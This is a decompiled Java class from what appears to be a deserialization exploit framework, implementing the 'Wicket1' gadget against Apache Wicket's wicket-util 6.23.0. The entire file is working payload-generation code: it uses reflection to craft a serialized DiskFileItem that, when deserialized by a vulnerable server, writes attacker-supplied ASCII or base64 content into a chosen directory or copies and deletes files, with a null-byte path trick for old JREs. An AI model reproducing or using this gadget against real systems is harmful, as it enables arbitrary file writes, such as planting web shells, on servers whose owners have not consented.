package com.ar3h.chains.gadget.impl.javanative.other;

import com.ar3h.chains.common.Gadget;
import com.ar3h.chains.common.GadgetChain;
import com.ar3h.chains.common.GadgetContext;
import com.ar3h.chains.common.Tag;
import com.ar3h.chains.common.annotations.GadgetAnnotation;
import com.ar3h.chains.common.annotations.GadgetTags;
import com.ar3h.chains.common.enums.Authors;
import com.ar3h.chains.common.param.Choice;
import com.ar3h.chains.common.param.Param;
import com.ar3h.chains.common.param.ParamType;
import com.ar3h.chains.common.util.Reflections;
import java.io.File;
import java.io.OutputStream;
import java.nio.charset.StandardCharsets;
import org.apache.commons.codec.binary.Base64;
import org.apache.wicket.util.io.DeferredFileOutputStream;
import org.apache.wicket.util.io.ThresholdingOutputStream;
import org.apache.wicket.util.upload.DiskFileItem;

@GadgetAnnotation(name = "Wicket1", description = "上传的文件名不可控(eg: upload_3805815b_2d50_4e00_9dae_a854d5a0e614_479431761.tmp), 仅可控文件目录和文件内容", dependencies = {"org.apache.wicket:wicket-util:6.23.0", "org.slf4j:slf4j-api:1.6.4"}, authors = {Authors.JACOBAINES})
@GadgetTags(tags = {Tag.JavaNativeDeserialize, Tag.END})
/* loaded from: input_file:BOOT-INF/lib/chains-core-1.4.1.jar:com/ar3h/chains/gadget/impl/javanative/other/Wicket1.class */
public class Wicket1 implements Gadget {

    @Param(name = "payload类型", description = "copyAndDelete;sourceFile;destDir\nwrite;destDir;ascii-data\nwriteB64;destDir;base64-data\nwriteOld;destFile;ascii-data\nwriteOldB64;destFile;base64-data", type = ParamType.Choice, choices = {@Choice("copyAndDelete"), @Choice("write"), @Choice("writeB64"), @Choice("writeOld"), @Choice("writeOldB64")})
    public String type = "write";

    @Param(name = "目标文件目录")
    public String targetDir;

    @Param(name = "文件内容", requires = false)
    public String content;

    public DiskFileItem getObject() throws Exception {
        if ("copyAndDelete".equals(this.type)) {
            return copyAndDelete(this.targetDir, this.content);
        }
        if ("write".equals(this.type)) {
            return write(this.targetDir, this.content.getBytes(StandardCharsets.US_ASCII));
        }
        if ("writeB64".equals(this.type)) {
            return write(this.targetDir, Base64.decodeBase64(this.content));
        }
        if ("writeOld".equals(this.type)) {
            return writeOldJRE(this.targetDir, this.content.getBytes(StandardCharsets.US_ASCII));
        }
        if ("writeOldB64".equals(this.type)) {
            return writeOldJRE(this.targetDir, Base64.decodeBase64(this.content));
        }
        throw new IllegalArgumentException("Unsupported command " + this.type);
    }

    @Override // com.ar3h.chains.common.Gadget
    public Object invoke(GadgetContext gadgetContext, GadgetChain gadgetChain) throws Exception {
        return getObject();
    }

    private static DiskFileItem copyAndDelete(String str, String str2) throws Exception {
        return makePayload(0, str2, str, new byte[1]);
    }

    private static DiskFileItem write(String str, byte[] bArr) throws Exception {
        return makePayload(bArr.length + 1, str, str + "/whatever", bArr);
    }

    private static DiskFileItem writeOldJRE(String str, byte[] bArr) throws Exception {
        return makePayload(bArr.length + 1, str + "��", str, bArr);
    }

    private static DiskFileItem makePayload(int i, String str, String str2, byte[] bArr) throws Exception {
        DiskFileItem diskFileItem = new DiskFileItem("test", "application/octet-stream", false, "test", 100000, new File(str), null);
        DeferredFileOutputStream deferredFileOutputStream = new DeferredFileOutputStream(i, new File(str2));
        ((OutputStream) Reflections.getFieldValue(deferredFileOutputStream, "memoryOutputStream")).write(bArr);
        Reflections.getField(ThresholdingOutputStream.class, "written").set(deferredFileOutputStream, Integer.valueOf(bArr.length));
        Reflections.setFieldValue(diskFileItem, "dfos", deferredFileOutputStream);
        Reflections.setFieldValue(diskFileItem, "sizeThreshold", 0);
        return diskFileItem;
    }
}
